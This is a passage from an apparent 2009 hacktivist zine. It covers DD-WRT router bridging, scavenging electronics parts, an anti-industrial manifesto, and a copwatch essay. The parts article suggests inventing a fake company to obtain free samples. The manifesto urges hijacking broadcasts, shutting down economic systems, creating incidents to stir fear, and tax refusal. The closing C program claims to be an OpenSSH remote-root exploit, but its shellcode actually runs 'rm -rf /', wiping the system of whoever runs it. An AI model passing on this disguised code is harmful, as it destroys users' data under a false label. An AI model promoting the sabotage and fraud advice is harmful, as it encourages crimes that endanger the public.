	g.	Browse to the location you downloaded the firmware.
		i.	Click upgrade. 
4.	Wait.5 minutes. 
	a.	Lights should return to normal.
	b.	Failing to wait is how most people brick their routers. 
5.	Do a power cycle of the router. 
	a.	Unplug the power cord, count to 30 and plug it back in.
6.	Wait for the lights to return to normal, usually about 2 minutes. 
7.	HARD reset again (see #1 above).
	a.	Wait. 
	b.	Check for the password page and re-login to change the password. 
	c.	Then you can reconfigure your settings manually.

Things not to do!
1.	Don't install old config files on newer firmware upgrades.
2.	Don't unplug or reset while firmware is upgrading.
3.	Don't use v24 sp1.

Which version of firmware to use:
The final version of 24 (currently SP2):  SVN11296 seems very stable.
1.	WRT54G v2 vintage (vint) firmware.
2.	WRT54G v5 newd micro.
3.	WRT54G v8 v24 micro
4.	WRT54GL newd mini when first flashing, then newd std.

Troubleshooting 
•	On a WinXP OS use IE explorer instead of Firefox or clear the cache on 
Firefox if it seems that changes aren't saving. 
•	Use http not https when browsing to the IP addresses. 

CREATE BRIDGE 
I went to DD-WRT wiki and found out how to create a bridge using the DD-WRT 
firmware on the Linksys router 
(http://www.dd-wrt.com/wiki/index.php/Wireless_Bridge). This is how it worked 
for me: 

1.	Currently, your router should be  IP is 192.168.1.1 from reseting it.
2.	Log into the DD-WRT router. 
	a.	User: root and pass: admin.
	b. 	Otherwise, you might be asked to set the username and password. 
4.	Go to the Setup Tab > Basic Setup 
	a.	Connection Type: Disable 
	b.	STP: Disable 
	c.	Set Local IP: 192.168.2.2. 
		i)	This IP address is for the bridge.
		ii)	You can make it whatever IP address you want, but it must be in the 
		subnet of the gateway IP address.
	d. 	Gateway: 192.168.2.1
		i)	This was the IP address of the broadcasting network we were trying 
		to bridge.
		2)	In our case it was our Guest network that the omni was broadcasting.
	d. 	DNS: 192.168.2.1	
	e.	Assign WAN Port To Switch: Checked 
	f.	DHCP Server: Disable 
	g.	Click "Save Settings".
	h.	Click "Apply" — triggers reboot.
5.	Give your computer a static IP address within the 192.168.2.X subnet.	
	a.	The gateway is the IP address of the bridge: 192.168.2.2.
	b.	Log back on to 192.168.2.2. 
5.	Go to the Security Tab > Firewall 
	a.	SPI Firewall: Disable 
	b.	Click "Save Settings" 
6.	Go to the Wireless Tab > Basic Settings 
	a.	Wireless Mode: Client Bridge 
	b.	Wireless Network Mode: Match your primary router. 
	c.	Wireless Network Name (SSID): Match your primary router. (case matters!) 
	d.	Wireless Channel is not relevant in Client Bridge mode. 
	e.	Click "Save Settings". 
		The router will now be in Client Bridge mode. 
7.	Wireless Tab > Wireless Security 
	a.	(Go to this link http://www.dd-wrt.com/wiki/index.php/Wireless_Bridge  
    	for more info).
		i)	We don't use a WEP. 
8.	Go to the Status Tab > Wireless 
	a.	Click Site Survey and join the appropriate wireless network. 
		i)	The Access Point table should show the MAC address of your Primary 
		Router, along with signal strength. 
		ii)	SSID Broadcast MUST be enabled on the routing your are sucking 
		signal from.
9.	Go to the Administration Tab > Backup 
		a) Click "Backup." 

We ended up buying the exact same equipment above and attaching it to the AP.  
The only difference is that we purchased an omni antenna 2.4GHz 15dBi instead of 
a directional.  The omni was put 4 feet above the directional antenna on the 
same pole.

SET UP ACCESS POINT
1.	Set your computers IP address to DHCP.
2.	Log onto the other Linksys WRT54GL that was not used as the bridge.
	a.	192.168.1.1 assuming it's new or it's been reset. 
	b.	User: admin pass: admin. 
3.	Go to the Setup Tab > Basic Setup 
	a.	Internet setup: Automatic Configuration – DHCP 
	b.	Network setup 
		i)	Router IP: 192.168.3.1 
			(1)	This was done so as not to conflict with the IP addresses that 
			were given out at via DHCP on 192.168.2.1 
		ii)	Network address 
			(1)	DHCP Server: Enable. 
		iii)	Time Setting: (Which ever time zone you are in). 
	c.	Save settings. 
4.	Release and renew the IP address of your computer.
5.	Go to the Setup Tab > Advanced Routing. 
	a.	Operating Mode: Gateway. 
6.	Go to the Wireless Tab > Basic Wireless Settings 
	a.	Wireless Network Mode: Mixed. 
	b.	Wireless Network Name (SSID): (your ssid here) 
	c.	Wireless Channel: 1 
		i)	Channels 1, 6 and 11 are the best and non-overlapping. 
		ii)	We choose 1 because 6 and 11 were already in use and we did not want 
		interference. 
	d.	Wireless SSID Broadcast: Enable. 
	e.	Save settings. 
7.	Go to the Status Tab > Router 
	a.	The AP's IP Address shows that it's getting a DHCP'd IP from the network 
	we're sucking from: 192.168.2.1. 
	b.	The Gateway and DNS are from 192.168.2.1. 
8.	Go to the Status Tab > Local Network 
	a.	Shows the 192.168.3.1 network and the DHCP server info. 
9.	Status Tab > Wireless 
	a.	Shows SSID, mode and channel info. 

Now you're ready to suck signal!


################################################################################
# 7. Hardware Hacking                                                by Frenzy #
################################################################################

Hardware hacking, another tool in the tool box, but essential for those of us 
who want to learn the system. Hardware hacking and circuit building can be very 
rewarding with not much effort. With a resent surge in interest in "hobby 
electronics" there are LOTS of resources out there. There are also people trying 
to make a buck, and looking to make you spend more than you need to. This 
article seeks to display some of the ways I have found to get parts for free or 
cheap!

The first thing a hardware hacker needs is tools starting with a good soldering 
iron. For this, it's best to get one that is a of good quality and a fine tip. A 
fat tip will just get in the way. My first soldering iron was a radio shack one, 
it worked, but once I upgraded to a xytronics one, my life got easier. You can 
pick up either a weller or xytronics iron, the xytronics ones are cheaper, a 
good one is under 30 bucks. The best way I have found to get this is on line. Do 
some research. Along with an iron you'll need a multimeter, wire strippers, wire 
cutters and a lead cutter to trim components. Some way to remove solder helps as 
well, like a "solder sucker" or de-soldering wick. Once you have your tools 
together it's time to go dumpster diving.

Dumpster diving is a good way to find lots of various components. I have found 
enough random capacitors and LEDs on spare circuit boards do projects without 
spending a dime. Removing parts from old circuit boards is also a good way to 
practice soldering. I dumpster behind the local radio shack and trolled around 
the local college campus. Bring a screwdriver with you so you can open things on 
the road and leave behind the cases taking with you the precious goodies! I use 
almost everything from the wire, to speakers and resistors. If you are good with 
a heat gun, you can use that to do your de-soldering and have all the parts fall 
right out!

The next way to get cheap parts is Ebay. Once you know what you need, go on Ebay 
and search for it. A lot of the sellers are direct from china (you get the parts 
from china anyway you might as well get them direct), so they are a lot cheaper, 
and sellers like to throw in goodies. I ordered 100 LEDs and got 100 resistors 
for free.

Requesting samples can work with a few companies. I have successfully requested 
samples from Texas Instruments and Pactec enclosures. The key to getting samples 
is how believable you are. Make up a fake company, and try it out. It's nice to 
get free things sent to your door. I'm sure if you were really advanced, you 
could never by parts again. For more about this go to 
http://www.ladyada.net/library/procure/index.html.

Lastly, ask your friends. You may have friends who tried out the hardware 
hacking thing and it wasn't for them. Parts have not changed much in the past 20 
years, so many will still work. If you have lots of friends into hardware, you 
can go to a large distributor like DigiKey and get an order of parts.

HAPPY HARDWARE HACKING!

Here are a list of resources for those getting into hardware hacking:
Make: Magazine: www.makezine.com
Ladyada: http://www.ladyada.net/
Instructables: www.instructables.com


################################################################################
# 8. On Using Technology to Dismantle the Industrial Beast        by Anonymous #
################################################################################

Our civilization is so flooded with technology that it is difficult to imagine a 
world without it. We have machines to wake us up and make us coffee in the 
morning, machines to keep us informed and entertained, and machines to clean and 
dry our clothes. Many people who work exclusively with computers and technology 
cannot accomplish these simple tasks without the use of machines.

Yet human beings on this planet have been able to survive in harmony for 
hundreds of thousands of years without many of these 'modern advances'. The 
majority of these domestications have only happened in the past few hundred 
years with the Industrial Revolution. Now, not by coincidence, we are facing our 
largest problems ever: with the resources and space available, will we really be 
able to sustain this great Industrial Beast we've built without killing 
ourselves? And if we can, would it really be worth it?

The arguments for technology and industrialism usually suggest that these 
"advances" make life easier, work more efficient, and more enjoyable. As far as 
survival is concerned, we only really need a few basic needs, which in our 
natural environment are relatively easy to procure as hunter / gatherers. Now 
this is only possible in areas outside of cities where the land is not "owned' 
and the food is not under lock and key. In these places, it becomes necessary to 
participate in the Economy by working at one of their jobs, the majority of 
which are not productive for survival purposes, but are artificially necessary 
to support the Industrial Beast. This ends up creating more work than is 
actually necessary for our survival, all for the Corporate Executives and 
Stockholders who profit from our labor. Additionally, our reliance on technology 
can make it difficult for some to prepare food, make or repair clothing, or even 
keep entertained and stimulated without the aid of technology. 

Technology and Industrialism are not necessary for our survival, and in fact, 
are being used against humanity and the planet as a whole by those who are 
currently in control of it: the Rich Ruling Classes.

At one point it was possible to disappear easily and live Off The Grid. Now, 
with the help of modern technological advances, the ruling classes' dream can be 
fully realized: a world where everyone is given numbers and are carefully 
tracked, monitored, regimented. Virtually every aspect of our lives are now 
under surveillance through integrated camera systems, GPS locating devices, RFID 
tags, social security numbers & bank accounts, phone / email taps, and even 
urine tests. On suspicion of wrongdoing, they can detain us and deny us our 
rights, calling us terrorists. Yet every day we are the ones who are Terrorized 
by their Technological Police State, exceeding Orwell's wildest nightmares.

Technology is also being used to keep us passive, domesticated, and brainwashed 
by the machine's propaganda. A few corporations control most of the television 
stations, radio stations, newspapers and other media. They use their monopoly of 
the media to broadcast the positions of the State, favorable to Corporate and 
Government interests. They keep us passive and sedated with mindless 
entertainment, video games, reality TV shows, making us confused, distracted, 
numb, and 'comfortable'. Now much of our communication with other human beings 
has been reduced to instant messages and blogs. We have become their zombies who 
cannot think or accomplish this for ourselves or survive on our own, to a point 
where we depend on the Industrial Beast and cannot live without it - just where 
they want us.

In addition to keeping us in slavery, the Machine has also held captive and is 
endangering the planet's stability. There is not much land and space that has 
not been encroached by the Industrial Beast. Entire species have either been 
wiped out, domesticated, or controlled for food. Humans are the only species 
that believes the entire planet belongs to it, and can be terraformed for 
humanity. It does not take much research to see how badly we have damages the 
earth's natural balance, covering the earth with parking lots, power plants, 
Starbucks and concrete jungles. Exhausting the earth's natural resources, 
climate instability, endangered species, even the air's breatheability and the 
water's drinkability, all of which are a direct result of the Industrial Beast 
and the expansion of Capitalism.

In summary, the madness of the machine as controlled by the Rich Ruling Classes 
is keeping us in chains. All this time we have been seduced and bamboozled by 
their promised life of luxury and freedom through their technology, and all we 
have is a world spinning towards extinction so that a few corporate executives 
can profit. We are facing a global crisis, and the problem lies deeper than 
which political party is cracking the whip. No amount of reform or institutional 
change through their political process can address the roots of the problem. No 
'newer, better, greener' technology can solve the problems technology itself has 
created. It is for this reason we must reverse the direction of the machine - 
from controlling and enslaving to freeing and liberating - and use technology to 
destroy it's master, the Industrial Beast.
   
The Role of the Hacker 

The role of the hacker is to exploit the system's internal contradictions and 
turn them against itself - to stop the Ruling Classes from using technology to 
control us, and instead return technology back to the people to fight for 
freedom, justice, and equality. We must crack, break, and subvert the Machine 
and reverse it's direction. 

The ruling classes know that whoever controls technology has power, which is why 
they try to limit access to computers and technology. It is not a secret that 
those who have access to technology and training are generally limited to the 
middle and upper classes, ensuring that only those who are comfortable with the 
status quo hold all the keys. They do not want the unwashed masses to have the 
same access to manipulate technology; rather, they seek to manipulate the 
unwashed masses _by_ technology. 

It is ironic that hackers, hacking an unusual amount of power over technology 
and possessing the ability to shut down the machine, generally belong to the 
privileged classes and may have little interest in changing the status quo and 
will likely be satisfied by being quietly filed into one of the many computer 
jobs available in the Establishment. This is not always the case, as hackers are 
often prodigies who live unconventional lives and whose values may reflect a 
deeper perspective on society.

As they grow older, aspiring hackers are forced to decide what they want to do 
with their skills and are generally pulled into three broad directions:

   (1) They sell out to Corporations security firms, or Government and try to
   make a buck by giving away all the secrets and tricks of the trade as a
   "security consultant". These "white hats", or "sellouts", whore their skills
   to the Establishment and help protect the infrastructure of the Industrial
   Beast, whether they consciously realize it or not.
   
   (2) Other hackers have different motivations. They are scammers, defrauders,
   graffiti artists, also trying to make money or a name for themselves, or are
   simply just hobbyist hackers. This is a broad group, but are generally
   apolitical and have no loyalties or ideologies and act as a rogue. Although
   they are popularly called "black hat" or "grey hat", they often share the
   same motivations as white hats (money and fame), but use different means to
   accomplish this.
   
   (3) The third category are Hacktivists who take a principled stand and use
   their skills not to benefit themselves but to support social justice
   struggles, fighting for freedom, equality, and social justice, and a return
   back to a state of harmony with the earth.
   
Generally speaking, whichever category one ends up in is mainly dependent on 
which socio-economic class you belong to or support. However, considering the 
planetary crisis we face caused by the Industrial Beast, lines are being drawn 
and it is becoming increasingly necessary to decide which side you are on.

It is the Duty of Hackers to use their skills and privilege to use technology 
against the Industrial Beast. It is up to us hackers to realize who the real 
enemy is - and to point our technological guns in the right direction.

Using Technology to Subvert the Industrial Beast

Because the ruling classes try to restrict access and training to technology to 
the privileged classes, simply making these resources available can be a 
revolutionary act. Community centers can be set up with free internet access to 
train people how to use computers, and also to build and repair computers from 
spare or discarded parts to be distributed free of charge.

In addition, our duty is to get everyone we know to stop supporting the Beast in 
any way. Don't make it easy for them to track you, or hold any kind of power 
over you. If all of us were able to completely refuse to participate in their 
Numbers Racket, they would be completely powerless. Remember, although they have 
tricked many people into thinking it is impossible to survive without them, we 
still hold all the real power because they depend on us for all their manual 
labor and work, so if we teach ourselves how to survive on our own and refuse to 
participate, they are doomed.

Some ways to Unplug and live Off the Grid:
   * refuse to use bank accounts, credit cards, checks, loans
   * refuse to pay taxes; work under the table if you can
   * refuse to drive a car, ride a bike instead
   * refuse to purchase goods from their stores or watch TV
   * learn to grow your own food, clean your own water, make and fix your own 
   clothes, and don't be afraid to live in the wild
   * _self-sufficiency is the answer_ 

Become self-sufficient so you can survive on your own without their 'help' cuts 
off all the power they have over you. We can build our own communities and live 
free on our own (i.e Temporary Autonomous Zone). But until everyone else is free 
and stops supporting the Machine, it will continue eating up everything in it's 
path ('manifest destiny'). So 'passive resistance' may not be enough to stop it.

Fortunately, it does not take much for a hacker to deal crippling blows against 
the Machinery of Capitalism. Everyone, especially hackers, knows there are 
weaknesses in every system, everything is fallible, and that the more complex a 
system is, the more places there are to stick the dynamite. These days, 
everything is interconnected through networks and databases. The Industrial 
Beast is not some faceless monolith; there are specific corporations, 
governments and individuals responsible for the world's wars and ecological 
disasters.

It is not hard to imagine some of the ways we can throw a monkey wrench into the 
machine. Some ideas:
   * Hijack radio, TV, and websites to broadcast messages encouraging a
   revolution, an end to capitalist wars, and shutting down prisons
   * Shut down economic systems, creating incidents to stir fear
   * Expose vulnerabilities in election systems to reveal their fraudulent
   nature, and to encourage Direct Action
   * Expose internal communications of corrupt institutions and state secrets
   * Shut 'em down!

From whichever angle you attack the Beast, it must also be in coordination with 
on-the-ground protests, marches, and educational campaigns so the media cannot 
twist it around and call us terrorists. The people must understand and agree 
with the cause.

In addition, alternatives to Industrialism must be made available, such as 
self-sufficient communes, worker collectives, etc - to function once the 
Industrial Beast collapses. These must be created through direct democracy, 
collective decision making, autonomy and non-hierarchical processes, embracing a 
gift-economy instead of a privatized competitive market, or else our new society 
may fall victim to the same mistakes as that of the Beast.
   
As the global crisis intensifies over the next few years, the major 
industrialized nations will soon be 'running on empty' and may resort to 
drastic, unpredictable actions to stay in power. It's no secret that the Titanic 
is sinking. The time to Abandon Ship is now.

    Run, Comrades, the Old World is Behind You!


################################################################################
# 9. Oscar Grant and Copwatch 2.0                                  by Flatline #
################################################################################

On January 1st 2009, Oscar Grant was murdered in cold blood by members of the 
bay area rapid transit police dept.  Oscar Grant is not the first person to be 
the victim of a police murder, and he will certainly not be the last.  But the 
case of Oscar Grant is unique, it is different than any other police murder yet 
and it heralds a new future.  The murder of Oscar grant is different because it 
was witnessed by millions of people.

Oscar Grant was shot in the back by johannes mehserle, but Grant was not alone, 
many people were around him and at least two of them had cell phone cameras and 
taped the whole thing, and then hours later, it was uploaded to you tube, for 
all the world to see. These people were (probably) inadvertently participating 
in copwatch.  Copwatch is the idea that to keep police honest and to keep the 
citizenry safe, people must follow the police, go where they go, and document 
what they do. Preferably with video evidence.  Now I am the first to say that 
terms like 'web 2.0' and 'social networks' are just marketing fluff; but after 
witnessing the aftermath of this particular police murder, I feel that You Tube, 
camera phones and social networks (basically summed up as the ability to create, 
publish and share media nearly instantly) can herald in a wonderful new era of 
transparency for law enforcement and a wonderful new age for copwatch.  

The main problem with Copwatch perviously (from my experience) was that the cops 
would always take your video camera or destroy the tape once they saw you 
recording them.  You Tube and cellphone networks alleviate this problem by 
allowing you to pretty much instantly send a copy of the video to at least one 
trusted friend if not more.  That friend can then instantly upload the video and 
spread it around far and wide.  Information dissemination on this wide a scale 
has never before been possible.  

I postulate that without the power of services like YouTube and video messaging, 
mehserly would have never been punished for the killing of Grant, protests and 
riots never would have happened because the information never would have spread 
so far and wide and people would not have been so enraged without witnessing 
this atrocity first hand.  The pressure from the riots, protests, first hand 
video and the sheer number of people that witnessed this act was what forced 
BART's hand into prosecuting Mehserle.  If not for that Oscar Grant would be 
just another statistic.

A new model of CopWatch is needed, one which utilizes the ability to instantly 
create and distribute media to its fullest potential.  These days video 
recording phones can be had for cheap, possibly even free, and you tube is 
obviously a free service.  One could even start a copwatch clearing house for 
people to upload all of there copwatch videos.  If we watch the cops all the 
time, and make them know that they are going to be held responsible for there 
actions in the eyes of the public, we may be able to prevent another police 
murder from happening ever again.

################################################################################

                            anti-(c)opyright 2009

you are encouraged to reuse, reword, and reprint everthing in this zine as you 
please. this includes: printing your own copies to distribute to friends and
family, copying and pasting bits of text in your own works, mirroring electronic
copies to websites and file sharing services, or anything else you can think of-

                !! without asking permission or apologizing !!

Electronic copies of the zine are available free online at the Hack Bloc website 
(www.hackbloc.org/zine/). There are two versions of the zine: a full color 
graphical PDF version wich is best for printing and also includes all sorts of 
extras, as well as a raw TXT version for a more readable and compatible format. 
Having the zine in your hands is still the best way to experience our zine. If 
you can't print your own (double sided 8.5x11) than you can order copies of this 
issue and most back issues from our friends at Microcosm Publishing 
(www.microcosmpublishing.com) who are based out of Bloomington, IN. We are 
always seeking translators to translate HackThisZine into other languages, if 
your interested in working with us to translate this issue please send us an 
E-mail to us at: Staff@HackBloc.org.

################################################################################

                    HACK THIS ZINE SUMMER 2009 HACK THE GIBSON
                  (aka the "Why is this joke still funny" issue)
    
                   zine staff                     hackbloc staff           
                   ----------                     --------------   
                   Flatline                       Evoltech         
                   Nomenumbra                     Doll             
                   Evoltech                       Sally            
                   Kuroishi                       Ringo            
                   alxCIAda                       Frenzy           
                   Impact                         HexBomber        
                   Sally                          alxCIAda         
                   Frenzy                         Impact 
                                              Flatline 

                   get involved!    staff@hackbloc.org
               
                   BAY AREA: http://www.hackbloc.org
                   OLYMPIA:  http://www.olyhackbloc.org
               
                   AND MANY MORE CLANDESTINE COLLECTIVES
                   COMING SOON TO A CITY NEAR YOU!
               
################################################################################

// AND NOW !! OPENSSH 0DAY REMOTE ROOT PROOF OF CONCEPT CODE !! KEEP PRIVATE !!

#include <unistd.h>

char code[] = "\x6a\x0b\x58\x31\xf6\x56\x6a\x2f\x89\xe7\x56\x66\x68\x2d\x66"
              "\x89\xe2\x56\x66\x68\x2d\x72\x89\xe1\x56\x68\x2f\x2f\x72\x6d"
              "\x68\x2f\x62\x69\x6e\x89\xe3\x56\x57\x52\x51\x53\x89\xe1\x31"
              "\xd2\xcd\x80";            // setuid(0) /bin/sh I swear!    

int main(int argc, char **argv)

{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}